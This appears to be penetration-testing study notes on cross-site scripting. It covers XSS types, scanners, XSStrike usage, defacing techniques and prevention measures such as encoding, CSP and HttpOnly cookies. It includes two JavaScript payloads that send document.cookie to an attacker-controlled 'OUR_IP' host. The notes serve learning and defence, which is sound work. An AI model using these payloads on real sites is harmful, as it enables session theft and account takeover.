XSS

Type	Description
Stored (Persistent) XSS	The most critical type of XSS, which occurs when user input is stored on the back-end database and then displayed upon retrieval (e.g., posts or comments)
Reflected (Non-Persistent) XSS	Occurs when user input is displayed on the page after being processed by the backend server, but without being stored (e.g., search result or error message)
DOM-based XSS	Another Non-Persistent XSS type that occurs when user input is directly shown in the browser and is completely processed on the client-side, without reaching the back-end server (e.g., through client-side HTTP parameters or anchor tags)

Automated Discovery

Vulnerability Scanners

• Nessus

• Burp Pro

• ZAP

Other Tools

• XSS Strike

• Brute XSS

• XSSer

$ git clone https://github.com/s0md3v/XSStrike.git
$ cd XSStrike
$ pip install -r requirements.txt
$ python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test" 

Manual Discovery

• PayloadAllTheThings

• PayloadBox

Defacing

• Background Color document.body.style.background

• Background document.body.background

• Page Title document.title

• Page Text DOM.innerHTML

Stealing Cookies

document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;

XSS Prevention

• Input Sanitization

• Input Validation

• Direct input - dont use user input that directs write to:

  • DOM.innerHTML

  • DOM.outerHTML

  • document.write()

  • document.writeln()

  • document.domain

• Output HTML Encoding in backend using htmlentities

• Server Configuration

  • Using HTTPS across the entire domain.

  • Using XSS prevention headers.

  • Using the appropriate Content-Type for the page, like X-Content-Type-Options=nosniff.

  • Using Content-Security-Policy options, like script-src 'self', which only allows locally hosted scripts.

  • Using the HttpOnly and Secure cookie flags to prevent JavaScript from reading cookies and only transport them over HTTPS.